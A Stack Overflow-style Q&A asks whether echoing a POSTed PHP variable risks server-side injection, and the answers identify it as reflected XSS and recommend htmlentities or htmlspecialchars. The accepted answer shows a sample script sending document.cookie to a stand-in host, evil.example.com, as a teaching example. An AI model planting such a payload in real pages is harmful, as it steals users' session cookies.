# PHP File Inclusion

Tags: php, security, xss

I have a textbox in which a user inputs a value and a PHP script echoes it out. The Textbox is sent to the server via `POST` and is saved in a variable called **Temp**.

If I create the output script with the below line, will the echo prevents File inclusion or arbitrary PHP injection, assuming that no validations are being done?

```
<?php echo $Temp; ?>
```

Comment: Possible duplicate of [How can I prevent SQL-injection in PHP?](http://stackoverflow.com/questions/60174/how-can-i-prevent-sql-injection-in-php)

Answer (score 1, accepted):

This is a classic reflected [Cross Site Scripting](https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)) vulnerability. Injected code will not execute on the server.

A malicious user could setup their own site that POSTs to your form. The POSTed value could be something like

```
<script>
new Img().src = 'https://evil.example.com?' + escape(document.cookie);
</script>
```

When a user that is logged into your site visits the malicious page, the attacker will retrieve the user's cookies for your site (well any that are not marked as [HttpOnly](https://www.owasp.org/index.php/HttpOnly)).
To mitigate this do the following:

```
<?php echo htmlentities($Temp); ?>
```

which will display any script as HTML rather than execute it.

Answer (score 2):

mkaatman's answer may or may not address your question. Javascript is client side, so there isn't any server-side maliciousness happening. If a user were to put something malicious in the text box that you echo back to them, they are only affecting themselves on the client side.

In other words, PHP is not going to execute what the user inputs in that variable if all you are doing is storing and echoing. No harm can be done to the server... and I think that was what you were asking

Comment: I agree with you but I think it's a good practice to use <?php echo htmlspecialchars($Temp); ?> in this situations.

Comment: Have a look at this post on [Cross SIte Scripting](https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)).

Comment: @SilverlightFox points out that it's possible for one user to intentionally affect another user, but 'reflected Cross Site Scripting' is still only client-side and poses no threat to the server (so I still do not consider it a server side vulnerability). PHP (the server) does NOT execute the code, only user's browsers execute the code.

Answer (score 1):

No. I could enter malicious javascript code in the input and the browser would execute that code when you viewed the page that had been generated with `<?php echo $Temp; ?>`

Answer (score 1):

It's a typical xss vulnerability
read more [here](http://phpsecurity.readthedocs.org/en/latest/Cross-Site-Scripting-%28XSS%29.html)
So always filter any user input right after you got it.
php has nice type conversion like `(string)$Temp` and as mentioned above `htmlspecialchars()` and `htmlentities()`